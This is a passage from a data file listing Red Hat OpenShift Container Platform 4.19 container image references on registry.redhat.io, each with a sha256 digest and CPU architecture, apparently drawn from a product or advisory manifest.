"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
